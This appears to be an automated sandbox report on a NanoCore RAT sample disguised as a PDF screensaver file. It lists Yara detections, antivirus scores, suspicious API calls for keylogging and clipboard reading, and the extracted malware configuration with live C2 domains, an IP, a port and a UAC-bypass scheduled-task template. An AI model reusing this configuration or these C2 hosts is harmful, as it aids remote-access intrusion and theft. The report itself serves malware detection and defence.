      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Multi AV Scanner detection for submitted file
      Source: 026910003102350.pdf.scr.exeReversingLabs: Detection: 46%
      Source: 026910003102350.pdf.scr.exeVirustotal: Detection: 45%Perma Link
      Multi AV Scanner detection for domain / URL
      Source: december2nd.ddns.netVirustotal: Detection: 12%Perma Link
      Source: december2n.duckdns.orgVirustotal: Detection: 5%Perma Link
      Source: december2nd.ddns.netVirustotal: Detection: 12%Perma Link
      Source: december2n.duckdns.orgVirustotal: Detection: 5%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeReversingLabs: Detection: 46%
      Source: 3.2.RegSvcs.exe.60b0000.7.unpackAvira: Label: TR/NanoCore.fadte
      Source: 19.2.RegSvcs.exe.d00000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
      Source: 026910003102350.pdf.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 026910003102350.pdf.scr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 026910003102350.pdf.scr.exe
      Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 00000003.00000000.380101330.0000000000E82000.00000002.00000001.01000000.0000000B.sdmp, RegSvcs.exe.2.dr
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00CCA69B
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00CDC220
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CEB348 FindFirstFileExA,0_2_00CEB348
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_0037E387
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037D836
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0038A0FA
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_0038A488
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,2_2_003865F1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034C642 FindFirstFileExW,2_2_0034C642
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00387248 FindFirstFileW,FindClose,2_2_00387248
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_003872E9
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_0037DB69

      Networking

      barindex
      Uses dynamic DNS services
      Source: unknownDNS query: name: december2n.duckdns.org
      Source: unknownDNS query: name: december2nd.ddns.net
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: december2n.duckdns.org
      Source: Malware configuration extractorURLs: december2nd.ddns.net
      Source: Joe Sandbox ViewASN Name: SPD-NETTR SPD-NETTR
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: Joe Sandbox ViewIP Address: 212.193.30.230 212.193.30.230
      Source: global trafficTCP traffic: 192.168.2.5:49700 -> 212.193.30.230:60705
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
      Source: unknownDNS traffic detected: queries for: december2n.duckdns.org
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038D7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,2_2_0038D7A1
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,2_2_0037A54A
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0038F45C
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0038F45C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,2_2_0038F45C
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003A9ED5 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_003A9ED5

      E-Banking Fraud

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR

      Operating System Destruction

      barindex
      Protects its processes via BreakOnTermination flag
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: 01 00 00 00 Jump to behavior

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
